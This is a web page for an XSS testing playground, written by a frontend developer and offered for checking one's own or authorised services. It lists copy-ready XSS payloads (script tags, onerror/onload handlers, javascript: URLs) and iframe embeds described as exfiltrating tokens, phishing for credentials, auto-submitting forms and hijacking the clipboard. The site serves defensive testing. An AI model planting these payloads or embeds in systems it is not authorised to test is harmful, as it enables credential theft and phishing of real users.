XSS Playground
复制即可测试的 XSS 场景集
About — Sangmook Kim
Frontend Engineer
我是前端开发者 Sangmook Kim。本站不是某个产品专用的 PoC,而是供所有人验证自有或被授权服务的 XSS 防护的公开 playground。
每个场景都把真实浏览器风险拆成小型测试页面:script 标签、事件属性、javascript: URL、DOM sink、嵌入式 iframe、父页面消息通信、欺骗性 UI 和自动请求。
从场景卡片或详情页复制 HTML payload 或 iframe 代码,粘贴到自己的项目中,检查渲染结果与真实浏览器行为。
项目意图
XSS 防护不能只靠某个 HTML 过滤器名称或一行过滤规则完成。需要在真实浏览器中确认 iframe、消息、权限提示、自动请求和欺骗性 UI 到底能运行到什么程度。
本站不是攻击自动化工具,而是帮助开发者和安全团队在自有或授权服务中复现并检查渲染策略的清单。
所有代码片段都以复制到 dev / staging 环境为前提。若 HTML payload 执行或 iframe 场景可运行,就是需要排查的信号;若被阻止,则可以记录是哪条策略发挥了作用。
使用方法
- 打开目标场景页面。
- 从首页卡片或详情页复制 HTML payload 或 iframe 代码。
- 粘贴到自有服务(编辑器、笔记、wiki 等)并保存。
- 检查渲染、sandbox、CSP、postMessage 校验和实际浏览器行为。
XSS 威胁地图
参考 Hacker101 CTF 的 XSS Playground 分类与 PortSwigger Web Security Academy 指南,本站将需要测试的风险整理如下。
查询参数、搜索词、错误消息等当前请求中的数据未经正确输出编码就被立即反射到 HTML 中。
评论、资料、文档正文等已保存的用户输入随后被其他用户以活动内容形式渲染。
客户端代码读取 location、hash、postMessage 等不可信值,并写入 innerHTML 或字符串计时器等危险 sink。
事件处理器、SVG/MathML、javascript: URL、编码与模板语法可能绕过薄弱黑名单或不完整 CSP。
脚本一旦执行,就可以以用户权限发起请求、操纵页面,并利用该用户可访问的数据。
iframe、覆盖层、通知、剪贴板和 postMessage 可能诱导用户输入机密,或把可观察信息发送到外部。
场景
按类别整理的攻击场景。可直接从卡片复制 HTML payload 或 embed 代码,也可进入详情页深入测试。
HTML Injection
Check whether a raw script tag executes when user input is parsed as an HTML document.
<script>alert("xss-playground")</script>Check whether on* attributes such as img onerror or details ontoggle survive filtering and execute.
<img src=x onerror="alert('xss-playground')">Check whether SVG, MathML namespaces, and event attributes bypass weak filters.
<svg onload="alert('xss-playground')" xmlns="http://www.w3.org/2000/svg"></svg>DOM XSS
Check whether location, hash, postMessage, or other untrusted values reach unsafe sinks such as innerHTML.
<img src=x onerror="alert('dom-xss')">URL / Protocol
Check whether javascript: remains in URL attributes such as href or action and executes on user interaction.
<a href="javascript:alert('xss-playground')">click me</a>Navigation
Replace the entire parent window from inside an iframe. The classic test for sandbox allow-top-navigation.
<iframe src="https://xss-playground.com/embed/top-redirect?lang=zh" title="XSS Playground - top.location forced redirect" width="600" height="420" loading="lazy" referrerpolicy="strict-origin-when-cross-origin"></iframe>
Communication
Send forged messages to the parent via parent.postMessage. If the parent skips event.origin validation, it can trust attacker-crafted payloads.
<iframe src="https://xss-playground.com/embed/post-message?lang=zh" title="XSS Playground - postMessage spoofing" width="600" height="420" loading="lazy" referrerpolicy="strict-origin-when-cross-origin"></iframe>
Submit a form to a third-party endpoint without user input.
<iframe src="https://xss-playground.com/embed/form-auto-submit?lang=zh" title="XSS Playground - Hidden form auto-submit (CSRF-style)" width="600" height="420" loading="lazy" referrerpolicy="strict-origin-when-cross-origin"></iframe>
Exfiltrate everything observable inside the iframe to an attacker server.
<iframe src="https://xss-playground.com/embed/beacon-exfil?lang=zh" title="XSS Playground - sendBeacon / fetch exfiltration" width="600" height="420" loading="lazy" referrerpolicy="strict-origin-when-cross-origin"></iframe>
The oldest CSRF: img.src to a state-changing GET endpoint sends cookies along.
<iframe src="https://xss-playground.com/embed/csrf-image?lang=zh" title="XSS Playground - img tag GET request CSRF" width="600" height="420" loading="lazy" referrerpolicy="strict-origin-when-cross-origin"></iframe>
Exfiltration
Multi-angle attempts to extract JWT, in-flight network, or storage from the parent. See exactly what SOP blocks and what slips through.
<iframe src="https://xss-playground.com/embed/token-exfil?lang=zh" title="XSS Playground - Parent token / network exfiltration attempts" width="600" height="420" loading="lazy" referrerpolicy="strict-origin-when-cross-origin"></iframe>
Phishing
Show a form that looks identical to the parent site's login UI and exfiltrate the credentials.
<iframe src="https://xss-playground.com/embed/phishing-form?lang=zh" title="XSS Playground - Fake login form (phishing)" width="600" height="420" loading="lazy" referrerpolicy="strict-origin-when-cross-origin"></iframe>
Cover the parent page with a fake but pixel-perfect UI rendered inside the iframe.
<iframe src="https://xss-playground.com/embed/fullscreen-overlay?lang=zh" title="XSS Playground - Fullscreen overlay impersonation" width="600" height="420" loading="lazy" referrerpolicy="strict-origin-when-cross-origin"></iframe>
Delayed / Chained
Countdown via URL params, then auto-fire an action. Used to evade immediate user suspicion.
<iframe src="https://xss-playground.com/embed/delayed-attack?lang=zh" title="XSS Playground - Delayed / auto-fire payload" width="600" height="420" loading="lazy" referrerpolicy="strict-origin-when-cross-origin"></iframe>
Fullscreen fake UI → credential capture → top redirect to the real site to cover tracks.
<iframe src="https://xss-playground.com/embed/chained-attack?lang=zh" title="XSS Playground - Chained attack (phishing + fullscreen + redirect)" width="600" height="420" loading="lazy" referrerpolicy="strict-origin-when-cross-origin"></iframe>
Annoyance
Force a file download without any user click.
<iframe src="https://xss-playground.com/embed/auto-download?lang=zh" title="XSS Playground - Auto-download trigger" width="600" height="420" loading="lazy" referrerpolicy="strict-origin-when-cross-origin"></iframe>
Open new windows. Same-origin popups can host arbitrary phishing UI.
<iframe src="https://xss-playground.com/embed/popup-spam?lang=zh" title="XSS Playground - popup / window.open spam" width="600" height="420" loading="lazy" referrerpolicy="strict-origin-when-cross-origin"></iframe>
Autoplay sound video, call requestFullscreen, and observe what gets through.
<iframe src="https://xss-playground.com/embed/autoplay-media?lang=zh" title="XSS Playground - Autoplay media / forced fullscreen" width="600" height="420" loading="lazy" referrerpolicy="strict-origin-when-cross-origin"></iframe>
Trigger Notification.requestPermission so the attacker domain can later push notifications.
<iframe src="https://xss-playground.com/embed/notification-permission?lang=zh" title="XSS Playground - Notification permission / push hijack" width="600" height="420" loading="lazy" referrerpolicy="strict-origin-when-cross-origin"></iframe>
Intercept the copy event and overwrite clipboard contents.
<iframe src="https://xss-playground.com/embed/clipboard-hijack?lang=zh" title="XSS Playground - Clipboard hijack" width="600" height="420" loading="lazy" referrerpolicy="strict-origin-when-cross-origin"></iframe>
Push a flood of history entries to wreck the parent's back-button behavior.
<iframe src="https://xss-playground.com/embed/history-pollution?lang=zh" title="XSS Playground - history.pushState pollution" width="600" height="420" loading="lazy" referrerpolicy="strict-origin-when-cross-origin"></iframe>
Probe
Try to reach parent.document, parent.localStorage, parent cookies — confirm what SOP actually blocks.
<iframe src="https://xss-playground.com/embed/sop-probe?lang=zh" title="XSS Playground - Same-Origin Policy probe (what is blocked)" width="600" height="420" loading="lazy" referrerpolicy="strict-origin-when-cross-origin"></iframe>
Fire a wide range of postMessage payloads at the parent and observe responses or side effects.
<iframe src="https://xss-playground.com/embed/parent-message-listener-probe?lang=zh" title="XSS Playground - Parent message-listener fingerprinting" width="600" height="420" loading="lazy" referrerpolicy="strict-origin-when-cross-origin"></iframe>
贡献 (Issues / PR)
本项目采用 source-available 许可证。源代码公开供查看与贡献,但不允许 fork 后另行部署、镜像或用于商业服务。
欢迎提交想法、缺陷报告、翻译改进与新场景建议。请先在 Issue 中讨论方案;获得认可后可被加为 collaborator,直接在本仓库中创建分支并提交 PR,避免长期维护 fork。
完整政策见 LICENSE 与 CONTRIBUTING.md。